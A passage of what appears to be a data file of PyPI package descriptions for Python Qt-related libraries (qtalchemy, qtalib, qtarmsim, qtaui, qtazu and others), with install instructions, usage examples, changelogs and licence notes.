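In rough terms, an ordinary Python method carries its menu/toolbar metadata in a decorator and QtAlchemy builds the Qt actions from it. The decorator name and signature in the sketch below are illustrative assumptions rather than the exact QtAlchemy API (see the documentation at http://qtalchemy.org for the real interface):\n\nclass PersonCommands(object):\n    @command(\"&Delete person\")            # hypothetical decorator carrying the menu caption\n    def cmd_delete(self, session, id):\n        # 'id' stands for the identifier of the row currently selected in the bound view\n        session.delete(session.query(Person).get(id))\n        session.commit()\n\n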
The power of this becomes more evident when bound to a view\nwhere the command function can then receive the identifier of the selected item\nof the view. This provides a flexible way to link commands to any sqlalchemy\nquery generated views.Documentation is available athttp://qtalchemy.org.QtAlchemy is currently being developed with Python 2.7.x, SQLAlchemy 0.8.x and\nPySide 1.2.x. Testing has been done on Python 3.3.2 and 2.7.5. SQLAlchemy\ntested versions include 0.8.2 and 0.9-pre. Testing includes linux and Windows\ntargets.As of QtAlchemy version 0.8.x, QtAlchemy uses PySide. See licensing comments\nat the bottom of this file. To use PyQt4 instead of PySide, you must install\nfrom the source in the bitbucket repository rather than PyPI since you need to\nconvert the source before running the install script. Install in the following\nway:python qtbindings.py --platform=PyQt4\npython setup.py build\nsudo python setup.py installExampleIn the interests of being concise, the example given here does not reference a\ndatabase.The UserAttr property class provides yet another type defined python property.\nThe purpose of reinventing this was to ensure that we could interact with our\nmodels sufficiently and provide a uniform experience for SQLAlchemy column\nproperties and UserAttr properties.>>> from qtalchemy import UserAttr\n>>> import datetime\n>>> class Person(object):\n... name=UserAttr(str,\"Name\")\n... birth_date=UserAttr(datetime.date,\"Birth Date\")\n... age=UserAttr(int,\"Age (days)\",readonly=True)\n...\n... @age.on_get\n... def age_getter(self):\n... return (datetime.date.today()-self.birth_date).daysWith this declaration, we can declare a person and compute their age:>>> me = Person()\n>>> me.name = \"Joel\"\n>>> me.birth_date = datetime.date(1979,1,9)\n>>> me.age #depends on today! -- #doctest: +SKIP\n11746\n>>> me.age-(datetime.date.today()-datetime.date(2011,1,9)).days # on birthday 1<<5\n11688We can create a dialog showing the name & birth-date. The main magic happens\nin the addBoundForm call which obtains labels from the UserAttr classes and\nplaces the correct edit widgets on screen.>>> from PySide import QtCore, QtGui\n>>> from qtalchemy import MapperMixin, LayoutLayout, ButtonBoxButton, LayoutWidget\n>>>\n>>> class PersonEdit(QtGui.QDialog,MapperMixin):\n... def __init__(self,parent,person):\n... QtGui.QDialog.__init__(self,parent)\n... MapperMixin.__init__(self)\n...\n... self.person = person\n...\n... vbox = QtGui.QVBoxLayout(self)\n... mm = self.mapClass(Person)\n... mm.addBoundForm(vbox,[\"name\",\"birth_date\"])\n... mm.connect_instance(self.person)\n...\n... buttons = LayoutWidget(vbox,QtGui.QDialogButtonBox())\n... self.close_button = ButtonBoxButton(buttons,QtGui.QDialogButtonBox.Ok)\n... buttons.accepted.connect(self.btnClose)\n...\n... def btnClose(self):\n... self.submit() # changes descend to model on focus-change; ensure receiving the current focus\n... self.close()And, now, we only need some app code to actually kick this off>>> app = QtGui.QApplication([])\n>>> sam = Person()\n>>> sam.name = \"Samuel\"\n>>> d = PersonEdit(None,sam)\n>>> d.exec_() # gui interaction -- #doctest: +SKIP\n0\n>>> sam.age # assumes selection of yesterday in the gui -- #doctest: +SKIP\n1DevelopmentQtAlchemy is still in heavy core development as schedule allows. Major new\nemphases include:abstracting query building for lists allowing user sorting and additional\ncolumnshtml generation for use with the QtWebKit bridgeqml view for queriesChangelog0.8.3:Python 3 support! 
No 2to3 or other gotchas.SQLAlchemy 0.9x compatibility fixes0.8.2:sqlalchemy 0.8x compatibility fixesmore PySide fixes0.8.1:mainly bugfixes for PySide support0.8.0:Change to PySide as default importsRelax license from GPL to LGPLImprove yoke change handlingCreate new PopupKeyListing for foreign key entry0.7.1:QueryDataView gained basic ability to requery on column header clicks for\nsortinga few doc fixesnew helper function family for using Geraldo in qtalchemy.ext.reporttools0.7.0:improved exception error handling and reporting for GUI applications with-out\nconsolenew yoke supporting a combo boximprove yoke documentationadd complete examples to front of documentationvarious model/list improvements including column width defaulting0.6.12:BoundCommandMenu has slots to be dispatched from html binding entity commands to\nhtml viewing formsstructured load and save extending the framework in BoundDialognew TreeView exposing the QTreeViewtree model support in PBTableModelimproved PySide portability and fixed various crash-bugs related to that0.6.11:context sensitive help and status tips for fieldsnew preCommand/refresh signals with CommandEvent structure allowing aborting by the ambient screenimprovements in the generic data import wizardtable view improvements (bug fixes, corrected model updates to be more precise)use pywin32 ShellExecute instead of os.system for better windows support0.6.10:renamed to qtalchemyexposed Qt\u2019s association of icons with commands appearing in menus and toolbarsmoved qtalchemy.PBTable to qtalchemy.widgets.TableViewnew qtalchemy.ext module for common dialogs (a data import wizard for now)0.6.9:wrote a broad outline of documentationadded boolean, time, and formatted text input yokesrewrote DialogGeo as WindowGeometry saving and restoring window and splitter\ngeometry for arbitrary windowsbrand new command structure replacing DomainEntity0.6.8:color and font control in the python business object layerimproved packaging support for windowsQGridLayout support in WidgetAttributeMapperextended UserAttr value storage to include attribute paths (e.g. self.sub.sub1.value)new QtAlchemy.xplatform module for cross platform helpersrewrote WidgetAttributeMapper using InputYoke methodologyrename PBEventMappedBase to ModelObjectadditions and corrections to examplesevent model corrections (more needed)0.6:new QtAlchemy.widgets sub-module for QLineEdit derived classes (others in the future)new QtAlchemy.dialogs sub-module for auth dialog classescontinued tweaks for PySide and nosetests0.5.1first usable (??) releaseLicenseQtAlchemy is licensed under the LGPL now that it defaults to shipping with\nPySide imports. I find this to be a rather unique licensing situation that we\nnow have with PyQt4 and PySide. I can write my code for PySide and LGPL it and\nit is totally legitimate. However, it also seems entirely legitimate for a\nuser of my library to switch the imports from PySide to PyQt4 \u2026 but then\nyou will need to consult a lawyer about the license for that amalgamation since\ndepending on PyQt4 requires the library to be GPL."} +{"package": "qtalib", "pacakge-description": "QTALIB: Quantitative Technical Analysis LibraryLatest update on 2022-12-18Technical indicators implemented in Cython/C. 
This is supposed to be a\nfaster technical analysis library with perfect integration to Python.Available technical indicatorsSimple Moving Average (SMA)Exponential Moving Average (EMA)Moving Average Convergence Divergence (MACD)Moving Standard Deviation function (MSTD)Relative Strength Index (RSI)True Range (TR)Absolute True Range (ATR)(Parabolic) Stop and Reverse (SAR)Super Trend (ST)Time Segmented Volume (TSV)On Balance Volume (OBV)Cyclicality (CLC)InstallationYou may run the folllowing command to install QTalib immediately:# Virtual environment is recommended (python 3.8 or above is supported)>>condacreate-nqtalibpython=3.8>>condaactivateqtalib# (Recommend) Install latest version from github>>pipinstallgit+https://github.com/josephchenhk/qtalib@main# Alternatively, install stable version from pip (currently version 0.0.2)>>pipinstallqtalibUsageimportnumpyasnpimportqtalib.indicatorsastavalues=np.array([12.0,14.0,64.0,32.0,53.0])# Simple Moving Average# [30. 36.66666667 49.66666667]print(ta.SMA(values,3))# Exponential Moving Average# [12. 13.33333333 42.28571429 36.8 45.16129032]print(ta.EMA(values,3))ContributingFork it (https://github.com/josephchenhk/qtalib/fork)Study how it's implemented.Create your feature branch (git checkout -b my-new-feature).Useflake8to ensure your code format\ncomplies with PEP8.Commit your changes (git commit -am 'Add some feature').Push to the branch (git push origin my-new-feature).Create a new Pull Request."} +{"package": "qtap", "pacakge-description": "Automatic Qt parameter entry widgets using function signaturesInstall using pip:pip install qtapBasic usage:fromPyQt5importQtWidgetsfromqtapimportFunctionsfrompyqtgraph.consoleimportConsoleWidgetdeffunc_A(a:int=1,b:float=3.14,c:str='yay',d:bool=True):passdeffunc_B(x:float=50,y:int=2.7,u:str='bah'):passif__name__=='__main__':app=QtWidgets.QApplication([])# just pass your functions as a list, that's it!functions=Functions([func_A,func_B])console=ConsoleWidget(parent=functions,namespace={'this':functions})functions.main_layout.addWidget(console)functions.show()app.exec()"} +{"package": "qtape", "pacakge-description": "There will be a preprint soon that explains the method! This package\nprovides a python API to an efficient C++ implementation. The python\nAPI does not provide much documentation, it just exposes the\nunderlying C++ class methods in src/qtape/ctape.h and\nsrc/qtape/ctape.cpp. Documentation for ctape.h is provided\ntherein. Doxygen documentation is available at:https://polybox.ethz.ch/index.php/s/UdFEQB9JrQJD5enTo view the docs, download and unzip the file from the link, and then\nopen html/index.html in your browser.Installationpython3-mpip install qtapeExampleFor a simple example seeexamples/simple_ex.py"} +{"package": "qtapi2", "pacakge-description": "No description available on PyPI."} +{"package": "qtapputils", "pacakge-description": "The qtapputils module provides various utilities for building Qt applications in Python."} +{"package": "qtarmsim", "pacakge-description": "QtARMSim is an easy to use graphical ARM simulator. It provides an easy\nto use multiplatform ARM emulation environment that has been designed\nfor Computer Architecture introductory courses.The ARMSim ARM simulator, Copyright (c) 2014-20 by Germ\u00e1n Fabregat, is\nbundled with QtARMSim. It can be found on thearmsim/subdirectory of the QtARMSim installation path.1. 
Installing QtARMSimIn order to install QtARMSim, its dependencies should be installed first.QtARMSim has the following dependencies:Python3,Qt for Python (PySide6), and ARMSim.ARMSim, which is bundled with QtARMSim, has in turn the next dependencies:Rubyand theGNU GCC Arm toolchain.The next subsections describe how to install QtARMSim and its dependencies on\nGNU/Linux, Windows and macOS.1.1 Installing QtARMSim on GNU/LinuxThe major GNU/Linux distributions already provide packages forPython3andRuby. Therefore, the provided package manager can be used to install them.\nAs for the GNU GCC, the required part of the GNU GCC Arm toolchain is bundled\nwith QtARMSim. Finally,Qt for PythonandQtARMSimcan be installed\nusing thepip3command provided byPython3.For example, on Ubuntu you can install QtARMSim using:$sudoaptinstallpython3-piprubylibxcb-xinerama0$sudogeminstallshelle2mmapsync$sudopip3installQtARMSimOn a Gentoo distribution, you can install QtARMSim issuing (as root):#emerge-avpipruby#pip3install--userQtARMSimIf you are installing QtARMSim on a system where PySide6 is already provided as\na package, you can install the packaged version of PySide6 and then install\nQtARMSim using the--no-depsoption (be aware that the packaged version can\nbe not so to up to date as the one obtained from pip). Once the PySide6\npackage(s) are installed, QtARMSim should be installed as follows:#sudopip3install--no-depsQtARMSim1.2 Installing QtARMSim on WindowsTo install QtARMSim on Windows please follow the next steps:Download a 64 bitsPython executable installerfromPython releases for Windows.\nDuring the installation process, please select theAdd Python 3.X to PATHoption.Download a 64 bitsRuby with Devkitinstaller fromRuby Installer for Windows.\nDuring the installation process, make sure that theAdd Ruby executables to your PATHoption is selected.Open a Windows console (executing eitherWindows PowerShellorcmd, depending on your Windows version), and execute the commands\nindicated in the next steps.3.1. Install theshell,e2mmapandsyncRuby modules with:PSC:\\Users\\Username>geminstallshelle2mmapsync3.2. Install QtARMSim using thepip3command:PSC:\\Users\\Username>pip3installQtARMSim1.3 Installing QtARMSim on macOSTo install QtARMSim on macOS, please follow the next steps:Download and installPython 3from thePython downloads page.Open aTerminaland execute the next command:$sudo-Hpip3installQtARMSimAfter doing the previous steps, you should be able to execute QtARMSim by\ntypingqtarmsimon anewTerminal.Note: If an error message appeared when executing thepip3command saying that\nthere was no matching distribution of PySide6 for your macOS version, you can\ninstead install PySide6 withMacPortsand QtARMSim with no\ndependencies using the following commands (MacPorts should be installed\npreviously):$sudoportinstallpy39-pyside6# same version as the installed Python$sudo-Hpip3install--no-depsQtARMSim1.4 Installing theGNU GCC Arm toolchain(optional)Starting with version 0.3.1 of QtARMSim, the required part of theGNU GCC Arm toolchainis already bundled with QtARMSim. 
So this step should only be done\nif there is a problem with the bundled GNU GCC Arm toolchain (i.e., QtARMSim\nis not able to assemble any source code).In this case, another instance of GNU GCC Arm toolchain can be installed and used.On GNU/Linux, this can be accomplished by installing a GNU GCC ARM package\nprovided by the GNU/Linux distribution being used, by building a cross-compiling\ntoolchain, or by extracting thegcc-arm-none-eabi-????-linux.tar.bz2file from theGNU Arm Embedded Toolchain Downloads page.For example, on Ubuntu, this optional step can be achieved with:$sudoaptinstallgcc-arm-linux-gnueabiAnd on Gentoo with:#emerge-avcrossdev#echo\"PORTDIR_OVERLAY=/usr/local/portage\">>/etc/portage/make.conf#crossdev--targetarm--ov-output/usr/local/portageOn Windows and macOS, to perform this optional step, download and execute the\nrespective Windows or macOS GNU GCC Arm toolchain package from theGNU Arm Embedded Toolchain Downloads page.Once a newGNU GCC Arm toolchainis installed, please\nconfigure theARMSim Gcc CompilerQtARMSim option to point to the newarm-none-eabi-gccexecutable.2. Executing QtARMSimTo execute QtARMSim, run theqtarmsimcommand, or click on the corresponding\nentry on the applications menu (on GNU/Linux, under theEducation:Sciencecategory).3. Upgrading QtARMSimTo upgrade an already installed version of QtARMSim, execute the following\ncommand on GNU/Linux:$sudopip3install--upgradeQtARMSimOn Windows:PSC:\\Users\\Username>pip3install--upgradeQtARMSimOn macOS:sudo -H pip3 install --upgrade QtARMSim4. Uninstalling QtARMSimTo uninstall QtARMSim on GNU/Linux, execute the following command:$sudopip3uninstallQtARMSimOn Windows:PSC:\\Users\\Username>pip3uninstallQtARMSimOn macOS:sudo -H pip3 uninstall QtARMSim5. Installation related known issuesIf something goes wrong after installing QtARMSim, executing theqtarmsimcommand on a terminal could give some insight of what is the error cause.The next known issues should not occur if the installation instructions are\nfollowed to the letter. They are listed here just in case they can be of some\nhelp when upgrading a previously installed version.The 5.14 packaged version of PySide2 on Ubuntu 20.04 LTS does not properly\ndisplay some icons and SVG images of QtARMSim. This can be solved by\ninstalling a newer version of PySide2 usingpip:$ sudo pip3 install PySide2On Ubuntu 20.04 LTS, if the next error is shown when executing QtARMSim from\na terminal:qt.qpa.plugin: Could not load the Qt platform plugin \"xcb\" in \"\" even though it was found.\n[...]It can be solved by installing the packagelibxcb-xinerama0:$ sudo apt install libxcb-xinerama0Starting with the 2.5 version of the Ruby installer,shell,e2mmapandsyncruby modules are no longer bundled in. Therefore, they must be\nmanually installed using thegemcommand, as stated in the general\ninstructions.Versions 5.12.0 and 5.12.1 of PySide2 introduced some changes that prevented\nQtARMSim to work. Version 5.12.2 of PySide2 corrected these regressions.LicenseCopyright 2014-20 Sergio Barrachina Mir This program is free software: you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation; either version 3 of the License, or (at\nyour option) any later version.This program is distributed in the hope that it will be useful, but\nWITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the GNU\nGeneral Public License for more details.You should have received a copy of the GNU General Public License\nalong with this program. If not, see .3rd party software acknowledgmentsThe next 3rd party software is used and distributed with QtARMSim.ARMSim: an ARM simulator, copyright Germ\u00e1n Fabregat Llueca, licensed\nunder the GPLv3+. Included under theqtarmsim/armsimdirectory.GCC, the GNU Compiler Collection,\ncopyright the Free Software Foundation, Inc, licensed under the GPLv3,\nwith the addition under section 7 of an exception described in the \u201cGCC\nRuntime Library Exception, version 3.1\u201d\n(see ).\nBinary versions targeting the ARM EABI are included under theqtarmsim/gcc-armdirectory.Qfplib: an ARM Cortex-M0 floating-point library in 1 kbyte, copyright Mark Owen,\nlicensed under the GPLv2. Source code\nincluded under the3rdparty/directory. This part of the code\nis only available under the GPLv2 license.AlphaSmart 3000font,\ndesigned by Colonel Sanders. Included under the3rdparty/directory.Changelog1.0.1 (2023-11-28)Fixed the way an ARM macOS is detected.1.0.0 (2023-11-03)Migrated from PySide2 to PySide6.Updated the bundled GNU GCC (cross) compilers and added the win64 and ARM macOS versions.Added the font increase and decrease functionality to the registers and memory panels.0.5.5 (2021-10-28)Fixed bug with macOS BigSur and PySide2.0.5.4 (2021-05-27)Fixed incompatibility with Ruby 3.0.0.5.3 (2020-11-06)Updated the installation instructions.A newer 64 bit GNU GCC Arm toolchain for macOS has been included.0.5.2 (2020-06-20)Updated the installation instructions.Updated post installation hook for linux.Post installation code reorganized to allow post_install to be installed as a script.0.5.1 (2020-06-13)Reformatted post_install code and added a hook for linux.Changed default QtARMSim icon by the SVG version.Moved post_install.py script outside of qtarmsim module to avoid its dependency on PySide2 (under certain circumstances, post-install is called before the PySide2 dependency is installed).0.5.0 (2020-05-25)Visualization improvements, especially on the trace ribbon (left area of the simulator).The registers at the register dock are now highlighted when a register is highlighted in the editor or in the simulator.Added Full Screen mode.Added new Compact layout. Hides everything but the registers and memory docks (which are stacked at the left) and the Edit/Simulation widget (which takes the rest of the window).The ARMSim path and GNU compiler path are tested on initialization. If they are no longer valid (usually due to a system python update), they are replaced by their default values.Improved the QtARMSim installation and integration on GNU/Linux, Windows and macOS. On GNU/Linux, the KDE expected mime type for assembler editors has been added. On Windows, a menu entry and a desktop shortcut are now created. 
On macOS, the qtarmsim script is automatically copied on /opt/local/bin/.Added a simulator output panel that displays the stdout of ARMSim (available only in debug mode).Fixed a bug in ARMSim due to GCC trimming the lines of the LST file at a fixed number of bytes, which under certain circumstances could lead to split a multi byte UTF-8 character and provoke an exception.0.4.19 (2020-05-05)Fixed bug: \u2018QPaintDevice: Cannot destroy paint device that is being painted\u2019.Updated ARMSim version.0.4.18 (2020-05-05)Fixed bug: assigning a PIPE to armsim stdout prevented the Windows version to work properly.0.4.17 (2020-05-04)Updated installation instructions for Windows systems.0.4.16 (2019-11-08)Added the Show/Hide tabs and spaces functionality (on the editor contextual menu).Saved files are forced to end with a new line (to avoid misleading the gcc compiler if the last line ended with a TAB).Added zoom in and zoom out via CTRL++ and CTRL+- (CTRL+wheel already was there).Tab width is now correctly computed.0.4.15 (2019-07-15)Added theprintfsubroutine to the ARMSim firmware.0.4.12 (2019-04-24)PySide2 5.12.2 has corrected the previously changed signature of QAbstractItemModel.createIndex(). The INSTALL documentation has been modified to no longer force the installation of PySide2 5.11.0.4.11 (2019-01-21)PySide2 5.12 has changed the signature of QAbstractItemModel.createIndex(), as it seems that they are going to do a regression, the INSTALL documentation has been changed to force the installation of the previous 5.11.2 version of PySide2.0.4.10 (2018-11-20)Added an scroll area inside the LCD Display dock widget (so that the LCD width does not force the whole simulator width).Changed LCD font to \u201cAlphaSmart 3000\u201d by Colonel Sanders.Added a new example of floating point operations usage,triangle.s, under \u2018File > Examples > Floating point\u2019 menu.0.4.9 (2018-10-16)Changed LCD font to \u201c1 Digit\u201d by David Chung.Fixed bug that prevented code to be resized.0.4.8 (2018-10-8)Properly acknowledging Qfplib by Mark Owen.0.4.7 (2018-7-27)Added memory contents tooltips.Added new example, LCD/ascii, and revised previous ones.Changed the way the monospaced font is selected.0.4.4 (2018-7-25)Migrated to Qt for Python (PySide2).Speeded up the filling of the simulator data.Added examples as a File menu entry.Added ARMSim tabs to separate the source code of the different ROMs.Added Qfplib (floating point library) API documentation to the help.Added UseLabels ARMSim option.Memory dock: first RAM is expanded by default and whenever a memory entry is modified it scrolls to its position.0.3.16 (2018-1-17)Corrected typo on the restructured text format of the changelog documentation.0.3.15 (2018-1-17)Added support in the simulator to showing jump labels instead of\ntheir addresses.Corrected errata on Qfp library acknowledgments.Removed legacy code from GlSpim.0.3.14 (2017-11-08)Added SVG icon support explicitly: the toolbar icons now will be\nalso shown on Windows.ARMSyntaxHighlighter rules are now generated only the first time.ARMSim:\n- Added support for floating point operations including Qfplib: an ARM Cortex-M0 floating-point library in 1 kbyte.\n- Corrected minor bug: .global declared labels generated a linking error.\n- Corrected minor bug: negative displacements on \u2018bl\u2019 instructions where incorrectly displayed.0.3.13 (2017-11-02)Added preliminary printing support.0.3.12 (2017-04-21)Changed the icon set to the KDE Breeze one.LCD Display not rescaling correctly on some 
desktop environments\nfixed.LCD display can now be zoomed with CTRL+mouse wheel.Editors and panels now honor the system default point size.Now the menu bar is displayed on the system menu bar on Mac OS X.0.3.11 (2016-10-30)The Edit menu actions have been implemented.Settings values are now automatically stripped to avoid errors due\nto misplaced spaces.ARMSim: updated firmware to correct a bug on sdivide subroutine.0.3.10 (2016-09-19)ARMSim: updated firmware to provide a signed division subroutine.0.3.8 (2016-09-19)Bug corrected: waiting spinner occluded File and Edit menus.0.3.7 (2016-09-18)Added firmware ROM that provides, among others, functions to display\nstrings and numbers on the LCD display. The new memory organization\nconsists of two ROM blocks and two RAM blocks. The first ROM block\nis filled with the assembled user code. The second ROM, with the\nfirmware machine code. The first RAM can be used to store the user\nprogram data. The second RAM is used by the LCD display.The graphical interface now uses a thread to retrieve the memory\ncontents and the disassembled code from the two ROM blocks.The regular expressions used to highlight the code on the editors\nhave been optimized to increase the highlighting process speed.0.3.5 (2016-09-12)Improved the Mac OS X compatibility and added installation\ninstructions for this platform.Changed the minimum size of the code editor container to accommodate\nlower resolution screens.ARMSim: (i) LSL result is now bounded to 32 bits; (ii) command\nredirection is performed explicitly to avoid an error on newer\nWindows versions; and (iii) the method used to compare whether\nmemory blocks where not defined has been changed to avoid errors on\nRuby with version >= 2.3.0.3.4 (2016-01-21)Added a memory dump dock widget that allows to see and edit the\nmemory at byte level. It also shows the ASCII equivalent of each\nbyte.Added a LCD display dock widget that provides a simple output\nsystem. It has a size of 32x6 and each character is mapped to a\nmemory position starting a 0x20070000.0.3.3 (2015-11-28)Added a visual indication of which instructions have already been\nexecuted on the left margin of the ARMSim panel.Added automatic scroll on simulation mode in order to keep the next\nline that is going to be executed visible.Improved the automatic selection of a mono spaced font (previously\nselected font used ligatures).Fixed an error on the Preferences Dialog which prevented to select\ntheARMSim directoryand theGcc ARM command lineusing the\ncorresponding directory/file selector dialogs.ARMSim: Fixed the simulation of shift instructions: only the 8 least\nsignificant bits are now used to obtain the shift amount.ARMSim.: Fixed the behavior when memory outside the current memory\nmap is accessed: each wrong access now raises a memory access error.Bundled a reduced set of the GNU compiler toolchain. To reduce the\npackage size, only those files actually required to assemble an\nassembly source code have been included.0.3.0 (2015-06-09)Migrated from PyQt to PySide to allow a simpler installation of\nQtARMSim.Developed a new source code editor based on QPlainTextEdit, though\nremoving the prior QScintilla dependency, which allows a simpler\ninstallation of QtARMSim.Improved the ARM Assembler syntax highlighting.0.2.7 (2014-11-05)Last revision of the first functional QtARMSim implementation. This\nimplementation was used on the first semester of an introductory\ncourse on Computer Architecture at Jaume I University. 
This is the\nlast version of that implementation, which used PyQt and QScintilla."} +{"package": "qtask", "pacakge-description": "UNKNOWN"} +{"package": "qtasktimer", "pacakge-description": "No description available on PyPI."} +{"package": "qtasync", "pacakge-description": "No description available on PyPI."} +{"package": "qt-async-threads", "pacakge-description": "qt-async-threadsallows Qt applications to use convenientasync/awaitsyntax to run\ncomputational intensive or IO operations in threads, selectively changing the code slightly\nto provide a more responsive UI.The objective of this library is to provide a simple and convenient way to improve\nUI responsiveness in existing Qt applications by usingasync/await, while\nat the same time not requiring large scale refactorings.SupportsPyQt5,PyQt6,PySide2, andPySide6thanks toqtpy.ExampleThe widget below downloads pictures of cats when the user clicks on a button (some parts omitted for brevity):classCatsWidget(QWidget):def__init__(self,parent:QWidget)->None:...self.download_button.clicked.connect(self._on_download_button_clicked)def_on_download_button_clicked(self,checked:bool=False)->None:self.progress_label.setText(\"Searching...\")api_url=\"https://api.thecatapi.com/v1/images/search\"foriinrange(10):try:# Search.search_response=requests.get(api_url)self.progress_label.setText(\"Found, downloading...\")# Download.url=search_response.json()[0][\"url\"]download_response=requests.get(url)exceptConnectionErrorase:QMessageBox.critical(self,\"Error\",f\"Error:{e}\")returnself._save_image_file(download_response)self.progress_label.setText(f\"Done downloading image{i}.\")self.progress_label.setText(f\"Done,{downloaded_count}cats downloaded\")This works well, but while the pictures are being downloaded the UI will freeze a bit,\nbecoming unresponsive.Withqt-async-threads, we can easily change the code to:classCatsWidget(QWidget):def__init__(self,runner:QtAsyncRunner,parent:QWidget)->None:...# QtAsyncRunner allows us to submit code to threads, and# provide a way to connect async functions to Qt slots.self.runner=runner# `to_sync` returns a slot that Qt's signals can call, but will# allow it to asynchronously run code in threads.self.download_button.clicked.connect(self.runner.to_sync(self._on_download_button_clicked))asyncdef_on_download_button_clicked(self,checked:bool=False)->None:self.progress_label.setText(\"Searching...\")api_url=\"https://api.thecatapi.com/v1/images/search\"foriinrange(10):try:# Search.# `self.runner.run` calls requests.get() in a thread,# but without blocking the main event loop.search_response=awaitself.runner.run(requests.get,api_url)self.progress_label.setText(\"Found, downloading...\")# Download.url=search_response.json()[0][\"url\"]download_response=awaitself.runner.run(requests.get,url)exceptConnectionErrorase:QMessageBox.critical(self,\"Error\",f\"Error:{e}\")returnself._save_image_file(download_response)self.progress_label.setText(f\"Done downloading image{i}.\")self.progress_label.setText(f\"Done,{downloaded_count}cats downloaded\")By using aQtAsyncRunnerinstance and changing the slot to anasyncfunction, therunner.runcalls\nwill run the requests in a thread, without blocking the Qt event loop, making the UI snappy and responsive.Thanks to theasync/awaitsyntax, we can keep the entire flow in the same function as before,\nincluding handling exceptions naturally.We could rewrite the first example using aThreadPoolExecutororQThreads,\nbut that would require a significant rewrite.DocumentationFor full documentation, 
please seehttps://qt-async-threads.readthedocs.io/en/latest.Differences with other librariesThere are excellent libraries that allow to use async frameworks with Qt:qasyncintegrates withasyncioqtriointegrates withtrioThose libraries fully integrate with their respective frameworks, allowing the application to asynchronously communicate\nwith sockets, threads, file system, tasks, cancellation systems, use other async libraries\n(such ashttpx), etc.They are very powerful in their own right, however they have one downside in that they require yourmainentry point to also beasync, which might be hard to accommodate in an existing application.qt-async-threads, on the other hand, focuses only on one feature: allow the user to leverageasync/awaitsyntax tohandle threads more naturally, without the need for major refactorings in existing applications.LicenseDistributed under the terms of theMITlicense."} +{"package": "qtaui", "pacakge-description": "qtaui - (c) J\u00e9r\u00f4me Laheurte 2015Table of contentsWhat is qtaui ?Supported platformsInstallationAPI documentationChangelogWhat is qtaui ?qtaui is a minimalist clone of wxPython\u2019swxaui. It allows a PySide-based program to arrange \u201cframes\u201d, i.e. child widgets, in an arbitrary tree of splitters and tabs. The user can \u201cundock\u201d a frame and let it float as a top-level window, or drop it back onto the UI in a position that will create a new splitter or tabbed interface, or add it to an existing one.This code is licensed under theGNU LGPL version 3 or, at your\noption, any later version.Supported platformsPython 2.7 with PySide 1.2.InstallationUsing pip:$ pip install -U qtauiFrom source:$ wget https://pypi.python.org/packages/source/q/qtaui/qtaui-1.0.3.tar.gz\n$ tar xjf qtaui-1.0.3.tar.bz2; cd qtaui-1.0.3\n$ sudo python ./setup.py installAPI documentationThe full documentation is hostedhere.ChangelogVersion 1.0.3:Fix addChild() signaturesVersion 1.0.2:Another Pypi-related fix\u2026Version 1.0.1:Pypi-related fixes.Version 1.0.0:First release."} +{"package": "qtawk", "pacakge-description": "DescriptionQtawk is a graphical tool to generate bash scripts very quickly and without pain.official websitehttps://qtawk.ntik.org/documentationhttps://qtawk.ntik.org/docs/index.htmlcontactmail :qtawk-dev@ntik.orgIRC : ntick.org #qtawk (port 6667 SSL)"} +{"package": "qtazu", "pacakge-description": "Python Qt widgets forCG-Wireusing`gazu`__.DependenciesThis requiresGazuandQt.py.What is Qtazu?Qtazuimplements Qt widgets to connect and work with a CG-Wire\ninstance through an interface running in Python.Reusable components to develop your own interfaces to interact with\nCG-Wire.Embeddable in DCCs supporting Python and QtOruse them in your own standalone Python application, like a\nstudio pipeline.Agnostic widgets so you can easily instantiate them as you needSupport PyQt5, PySide2, PyQt4 and PySide through`Qt.py`__WIP:This is a WIP repositoryExamplesThe Widgets initialize in such a way you can easily embed them for your\nneeds.The examples assume a running Qt application instance exists.Logging inqtazu_loginfromqtazu.widgets.loginimportLoginwidget=Login()widget.show()If you want to set your CG-Wire instance URL so the User doesn\u2019t have to\nyou can set it through environment variable:CGWIRE_HOSTfromqtazu.widgets.loginimportLoginimportosos.environ[\"CGWIRE_HOST\"]=\"https://zou-server-url/api\"widget=Login()widget.show()Directly trigger a callback once someone has logged in using Qt 
signals:fromqtazu.widgets.loginimportLogindefcallback(success):print(\"Did login succeed? Answer:%s\"%success)widget=Login()widget.logged_in.connect(callback)widget.show()You can also automate alogin through\n``gazu``__ andqtazuwill use it.Or if you have logged in through another Python process you can pass on\nthe tokens:importosimportjson# Store CGWIRE_TOKENS for application (simplified for example)os.environ[\"CGWIRE_TOKENS\"]=json.dumps(gazu.client.tokens)os.environ[\"CGWIRE_HOST\"]=host# In application \"log-in\" using the tokenshost=os.environ[\"CGWIRE_HOST\"]tokens=json.loads(os.environ[\"CGWIRE_TOKENS\"])gazu.client.set_host(host)gazu.client.set_tokens(tokens)Submitting CommentsYou can easily submit comments for a specific Task, this includes drag\n\u2018n\u2019 dropping your own images of videos as attachment or using a Screen\nMarguee tool to attach a screenshot to your comment.Make sure you are logged in prior to this.fromqtazu.widgets.commentimportCommentWidgettask_id=\"xyz\"# Make sure to set a valid Task Idwidget=CommentWidget(task_id=task_id)widget.show()qtazu_comment_screenshotDisplay all Persons with ThumbnailsIt\u2019s easy and quick to embed the available Persons into your own list\nview.qtazu_persons_modelfromqtazu.models.personsimportPersonModelfromQtimportQtWidgets,QtCoremodel=PersonModel()view=QtWidgets.QListView()view.setIconSize(QtCore.QSize(30,30))view.setStyleSheet(\"QListView::item { margin: 3px; padding: 3px;}\")view.setModel(model)view.setMinimumHeight(60)view.setWindowTitle(\"CG-Wire Persons\")view.show()Here\u2019s an example prototype of listing Persons as you tag them:qtazu_tag_prototype_02Define your own Qt widget that loads Thumbnails in the backgroundThis will show all CG-Wire projects as thumbnails.qtazu_projectsimportgazufromQtimportQtWidgetsfromqtazu.widgets.thumbnailimportThumbnailBasemain=QtWidgets.QWidget()main.setWindowTitle(\"CG-Wire Projects\")layout=QtWidgets.QHBoxLayout(main)forprojectingazu.project.all_open_projects():thumbnail=ThumbnailBase()thumbnail.setFixedWidth(75)thumbnail.setFixedHeight(75)thumbnail.setToolTip(project[\"name\"])project_id=project[\"id\"]thumbnail.load(\"pictures/thumbnails/projects/{0}.png\".format(project_id))layout.addWidget(thumbnail)main.show()Welcome a User with a messageShow a Welcome popup to the user with his or her thumbnail.qtazu_welcome_popupfromQtimportQtWidgets,QtGui,QtCorefromqtazu.widgets.thumbnailimportThumbnailBaseimportgazuclassUserPopup(QtWidgets.QWidget):\"\"\"Pop-up showing 